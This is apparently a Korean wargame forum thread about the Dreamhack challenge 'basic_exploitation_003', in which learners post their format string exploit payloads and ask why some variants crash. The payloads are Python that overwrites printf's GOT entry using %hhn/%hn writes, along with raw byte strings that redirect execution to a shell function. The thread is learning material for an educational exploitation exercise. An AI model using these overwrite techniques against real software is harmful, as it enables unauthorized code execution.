basic_exploitation_003

문제를 푸는 것은 성공했으나 그 과정과 관련해서 질문을 올리고자 합니다. 처음에는 이전 문제와 비슷하겠지 하고 다음과 같이 짰었습니다. shell1 = 0x69 shell2 = 0x86 shell3 = 0x04 shell4 = 0x08 payload = p32(printf_got) payload += p32(printf_got + 1) payload += p32(printf_got + 2) payload += p32(printf_got + 3) payload += ('%{}c'.format(shell1 - 16)).encode() payload += b'%1$hhn' payload += ('%{}c'.format(shell2 - shell1)).encode() payload += b'%2$hhn' payload += ('%{}c'.format(0x100 + shell3 - shell2)).encode() payload += b'%3$hhn' payload += ('%{}c'.format(0x100 + shell4 - shell3)).encode() payload += b'%4$hhn' 이렇게 짜인 페이로드를 보내보니 EOF로 쉘이 터져서 고민하다가 어차피 상위 2바이트는 printf와 get_shell이 똑같으니 하위 2바이트만 덮으면 되겠구나 싶어서 다시 아래처럼 고쳐서 다시 시도해보니 제대로 동작했습니다. shell1 = 0x69 shell2 = 0x86 payload = p32(printf_got) payload += p32(printf_got + 1) payload += ('%{}c'.format(shell1 - 8)).encode() payload += b'%1$hhn' payload += ('%{}c'.format(shell2 - shell1)).encode() payload += b'%2$hhn' 뭔가 느껴지는 건 첫 번째에서는 stack_buf의 크기를 넘어가버려서 터진건가 싶은데 확신이 없어서 이게 맞는건지, 아니면 다른 이유가 있는건지 궁금합니다.

https://dreamhack.io/board/beta-feedback/129 그림이 첨부가 안되서 피드백 쪽에다 남겼는데 답변이 달리지 않아 다시 이곳에 올립니다 제가 어떤 부분을 착각하고 있는건지 알려주시면 감사하겠습니다 ㅠㅠ

basic-exploitation-002 에도 동일한 증상이 있습니다. 도저히 모르겠네요. 로컬에서 Ubuntu 16.04, x86을 설치해서 거기서 직접 binary를 실행해서 페이로드를 주입하면 gdb 상에서도 return address 교체가 되는 걸 볼수가 있는데 get_shell에 가기 전에 seg fault 발생하면서 죽습니다. 동일한 페이로드를 dreamhack 서버에 전달하면 shell을 획득합니다. basic-exploitation-002도 flag는 획득은했는데 로컬에서하면 Seg Fault로 죽네요. 이유가 뭘까요? 참고로 ./basic-exploitation-003 < input.bin 이렇게 실행했고 xxd input.bin 으로 확인했을때도 페이로드 잘 들어가있습니다.

basic_exploitation_002 처럼 바꿀 값의 주소를 처음 스택에 입력하고 해당 주소에 %n을 이용해 값을 입력하는 풀이를 사용해보았는데 sprintf에서 seg fault가 납니다. sprintf함수 에서 segfault가 나는 이유가 스택으로 복사된 문자열 ex) AAAA%2050c.... => 414141412020202020202020.... 이 너무 길어서 그런거라고 대충이해했는데, 너무 큰 값을 스택영역으로 옮기다보니, 그 값이 스택영역을 벗어나는 경우가 생겨 세그폴트가 났다.. 라고 이해해도 될까요?? 문제는 해결하였지만 basic_exploitation_002와 같은 방법으로는 풀이가 왜 불가능한지 여쭤보고싶습니다.

처음에는 "%1$hn" 2바이트 방식으로 접근해서 풀려고하는데 도저히 쉘을 획득할 수 없었기에 (제가 지식이 너무 짧아서...) "%1$hhn"으로 1바이트로 했더니 되었습니다..이유가 있나요?? 첫 번째 %hn 페이로드 : \x12\xa0\x04\x08\x10\xa0\x04\x08%2044c%1$hn%32357c%2$hn 두 번째 %hhn 페이로드 : \x10\xa0\x04\x08\x11\xa0\x04\x08%97c%1$hhn%29c%2$hhn

sprintf 함수로 버퍼를 채운 뒤 ret address를 덮어 씌우는 방식을 많이 사용하시는 것 같은데, 저는 fsb의 정석(?) 대로 printf 의 got을 덮어 씌우는 방법을 사용했습니다. 다만, 여기서 의문 사항이 몇 가지 있어 질문 드립니다. 전체적인 페이로드는 아래와 같이 작성했습니다. pay = b'AAAA' pay += p32(overwrite+2) pay += p32(overwrite+1) pay += p32(overwrite) pay += p32(overwrite+3) pay += b'%85c%4$hhn' pay += b'%29c%3$hhn' pay += b'%126c%2$hhn' pay += b'%4c%hhn' fsb는 첫 번째 %p부터 발생하는 것을 확인하였습니다. 하지만 실제로 값을 넣어보면 dummy 값 4 byte 이후부터 값이 들어가는 것을 보았습니다. 왜 이런 것인가요? 위의 페이로드에서 보듯이, 삽입하는 주소 값이 순서대로가 아닌 +3 -> 0 -> +1 -> +2 로 삽입하여야 제대로 값이 들어가는 것을 확인하였습니다. 1항과 연계되어 발생하는 문제인 것 같긴한데... 왜 그런지 모르겠습니다.

payload = b'%105c%7$hhn' + b'%29c%8$hhnAAA' + p32(print_got) + p32(print_got+1) payload = p32(print_got) + p32(print_got+1) + b'%97c%1$hhn' + b'%29c%2$hhn' (1번)포맷스트링 + 주소의 경우에는 seg fault가 발생하고 (2번)주소 + 포맷스트링의 경우에는 print_got의 하위 2바이트가 정상적으로 덮어씌워졌습니다. 왜 동일한 코드(제가 생각하기에는요)인데 결과가 다르게 나오는지 궁금합니다.

main의 ret값을 변조시키는건 안되는건가여?